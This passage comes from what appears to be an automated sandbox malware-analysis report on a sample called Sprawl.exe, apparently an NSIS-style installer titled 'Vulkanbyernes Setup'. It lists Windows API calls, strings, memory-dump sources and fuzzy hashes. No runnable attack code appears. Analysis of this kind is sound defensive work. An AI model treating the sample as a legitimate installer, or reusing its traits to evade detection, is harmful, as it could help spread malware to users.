                                                                                                                            • GetShortPathNameA.KERNEL32(0042B9F8,0042B9F8,00000400), ref: 00405AD1
                                                                                                                            • wsprintfA.USER32 ref: 00405AEF
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,0042B9F8,C0000000,00000004,0042B9F8,?,?,?,?,?), ref: 00405B2A
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B39
                                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B71
                                                                                                                            • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0042B1F8,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BC7
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00405BD8
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BDF
                                                                                                                              • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Sprawl.exe,80000000,00000003), ref: 004059A6
                                                                                                                              • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                            • String ID: %s=%s$NUL$[Rename]
                                                                                                                            • API String ID: 222337774-4148678300
                                                                                                                            • Opcode ID: 1f98854de7e5c40725f23c70871346fb007f1980b568e50079ef848d7602898f
                                                                                                                            • Instruction ID: 8a014ae25a2f57f4e7f496887e8afb480c0f68f452f449b39f33bde68a4ee9be
                                                                                                                            • Opcode Fuzzy Hash: 1f98854de7e5c40725f23c70871346fb007f1980b568e50079ef848d7602898f
                                                                                                                            • Instruction Fuzzy Hash: 5231F370604B19ABC2206B615D49F6B3A6CDF45758F14053AFE01F62D2DA7CB800CEAD
                                                                                                                            APIs
                                                                                                                            • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Sprawl.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                                                                            • CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                                                                            • CharNextA.USER32(?,"C:\Users\user\Desktop\Sprawl.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                                                                            • CharPrevA.USER32(?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                                                                            Strings
                                                                                                                            • "C:\Users\user\Desktop\Sprawl.exe", xrefs: 00405FD6
                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F9B
                                                                                                                            • *?|<>/":, xrefs: 00405FE2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Char$Next$Prev
                                                                                                                            • String ID: "C:\Users\user\Desktop\Sprawl.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                            • API String ID: 589700163-605302055
                                                                                                                            • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                                                            • Instruction ID: 57e0f34d942670e43035b7c22e392f1a12bb14715b301cf1348a0c798ab9ef07
                                                                                                                            • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                                                            • Instruction Fuzzy Hash: 8B112751809B932AFB3256244C00B7BBFD88F57760F19007BE8D5722C2D67C5D529B6D
                                                                                                                            APIs
                                                                                                                            • GetWindowLongA.USER32(?,000000EB), ref: 00403F98
                                                                                                                            • GetSysColor.USER32(00000000), ref: 00403FB4
                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00403FC0
                                                                                                                            • SetBkMode.GDI32(?,?), ref: 00403FCC
                                                                                                                            • GetSysColor.USER32(?), ref: 00403FDF
                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00403FEF
                                                                                                                            • DeleteObject.GDI32(?), ref: 00404009
                                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404013
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2320649405-0
                                                                                                                            • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                                                            • Instruction ID: f3431a0ddd372d44177634c3e6640760e16b4c563197d04d055afd4279a4596b
                                                                                                                            • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                                                            • Instruction Fuzzy Hash: F4219F71808705ABCB209F78DD48A4BBBF8AF41704B048A2AE996F26E0C734E904CB55
                                                                                                                            APIs
                                                                                                                            • lstrlenA.KERNEL32(00429048,00000000,0041C205,762323A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                                            • lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,762323A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                                            • lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,762323A0), ref: 00404FA4
                                                                                                                            • SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2531174081-0
                                                                                                                            • Opcode ID: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
                                                                                                                            • Instruction ID: 5247e829223e414f07dbea0a4ec6ac131d28d962b221907bbf4360a320382309
                                                                                                                            • Opcode Fuzzy Hash: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
                                                                                                                            • Instruction Fuzzy Hash: 76218C71D00118BBDF219FA5DC84ADEBFA9EF08354F10807AF904B6291C7798E408FA8
                                                                                                                            APIs
                                                                                                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040482E
                                                                                                                            • GetMessagePos.USER32 ref: 00404836
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404850
                                                                                                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404862
                                                                                                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404888
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                                            • String ID: f
                                                                                                                            • API String ID: 41195575-1993550816
                                                                                                                            • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                                                            • Instruction ID: 72a6dff9965abeea3fde93c43f55bc8d1d0b984f63b53e8c81f3052648e7bb03
                                                                                                                            • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                                                            • Instruction Fuzzy Hash: EC019275D00218BADB00DBA5DC41FFEBBBCAF45711F10412BBB10B61C0C7B4A5018BA5
                                                                                                                            APIs
                                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                                                                                                            • MulDiv.KERNEL32(000D6E84,00000064,000D6E88), ref: 00402BC5
                                                                                                                            • wsprintfA.USER32 ref: 00402BD5
                                                                                                                            • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                                                                                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                                                                                            Strings
                                                                                                                            • verifying installer: %d%%, xrefs: 00402BCF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                            • String ID: verifying installer: %d%%
                                                                                                                            • API String ID: 1451636040-82062127
                                                                                                                            • Opcode ID: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                                                                                            • Instruction ID: f77185bba9c57e6aa61c0c8aee9f592e237af7c43fbef78eddb3d4185353df7a
                                                                                                                            • Opcode Fuzzy Hash: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                                                                                            • Instruction Fuzzy Hash: D001F471640208BBEF209F60DD09EAE3779EB04744F008039FA16B51D1D7B5A955DB59
                                                                                                                            APIs
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                                                                                            • GlobalFree.KERNEL32(?), ref: 0040276F
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                                                                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2667972263-0
                                                                                                                            • Opcode ID: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
                                                                                                                            • Instruction ID: 5d6717e5ef000630179c441ec4dabf90fe6e4dbd5b0bc7dedcefa97c90ee8361
                                                                                                                            • Opcode Fuzzy Hash: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
                                                                                                                            • Instruction Fuzzy Hash: 1D215E71800124BBCF216FA5CE49EAE7E79EF09324F14423AF910762D1D7795D418FA9
                                                                                                                            APIs
                                                                                                                            • SetWindowTextA.USER32(00000000,Vulkanbyernes Setup), ref: 00403A0C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: TextWindow
                                                                                                                            • String ID: "C:\Users\user\Desktop\Sprawl.exe"$(N$1033$Vulkanbyernes Setup
                                                                                                                            • API String ID: 530164218-3546199828
                                                                                                                            • Opcode ID: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
                                                                                                                            • Instruction ID: fbf6035dbb292e76ee93bcdc762ea67a79fb5cde0254510f453a1e05a67cff09
                                                                                                                            • Opcode Fuzzy Hash: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
                                                                                                                            • Instruction Fuzzy Hash: 97110871B046109BC730AF56DC409737B6CEF89319368423FE801A73D1D639AD03CAA9
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1912718029-0
                                                                                                                            • Opcode ID: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
                                                                                                                            • Instruction ID: e0b40e6d550d0c6dedecb0be42375ee7245bd63e637183e656586a56a8cfacd8
                                                                                                                            • Opcode Fuzzy Hash: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
                                                                                                                            • Instruction Fuzzy Hash: 66116D31A00108FEDF22AF90DE89EAA3B7DEB54349B104436FA01B10E0D774AE51DB69
                                                                                                                            APIs
                                                                                                                            • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                                                                            • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                                                                            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1849352358-0
                                                                                                                            • Opcode ID: df9cc67d31b04cd6e9f5647a99bb7b911e6a77bbf16d980a5e8a288dfb7b3bdc
                                                                                                                            • Instruction ID: 718a49c372d49eeeb619100b459207f1cde729867d9d835a9e14b5832590348d
                                                                                                                            • Opcode Fuzzy Hash: df9cc67d31b04cd6e9f5647a99bb7b911e6a77bbf16d980a5e8a288dfb7b3bdc
                                                                                                                            • Instruction Fuzzy Hash: 74F0E7B2A04114AFEB01EBE4DE88DAFB7BDEB54305B10447AF602F6191C7749D018B79
                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(?), ref: 00401D3B
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                                                                            • CreateFontIndirectA.GDI32(0040A818), ref: 00401DB3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
